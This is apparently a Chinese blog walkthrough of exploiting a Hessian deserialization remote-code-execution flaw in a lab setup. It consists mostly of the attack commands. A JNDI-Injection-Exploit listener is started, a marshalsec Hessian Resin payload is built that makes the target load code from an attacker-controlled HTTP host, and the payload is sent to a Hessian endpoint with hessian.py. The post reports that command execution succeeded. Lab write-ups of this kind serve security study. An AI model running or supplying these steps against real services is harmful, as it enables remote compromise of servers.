Hessian反序列化RCE漏洞

启动JNDI利用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A 192.168.31.102
  • -C为需要执行的命令
  • -A为监听地址
    Hessian反序列化RCE漏洞

生成payload

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin http://192.168.31.102:8180/ ExecTemplateJDK7>hession

Hessian反序列化RCE漏洞

发送payload到hessian服务器

python hessian.py -u http://192.168.31.36:8080/HessianTest/hessian -p hession

Hessian反序列化RCE漏洞

这里的报错是因为我python环境的问题
这里我踩了一个坑,hessian.py里需要用到一个argparse包,我本机的环境一直出问题,最后更新了pip,更新了argparse包才搞定

  • 命令执行成功
    Hessian反序列化RCE漏洞

指纹

HTTP发送二进制的数据包 ???
参考:https://www.freebuf.com/vuls/224280.html

相关文章:

  • 2022-12-23
  • 2020-10-06
  • 2021-06-11
  • 2022-01-13
  • 2021-08-19
  • 2021-06-17
猜你喜欢
  • 2021-08-12
  • 2021-07-30
  • 2022-02-17
  • 2021-09-22
  • 2021-11-12
  • 2021-08-26
  • 2022-01-13
相关资源
相似解决方案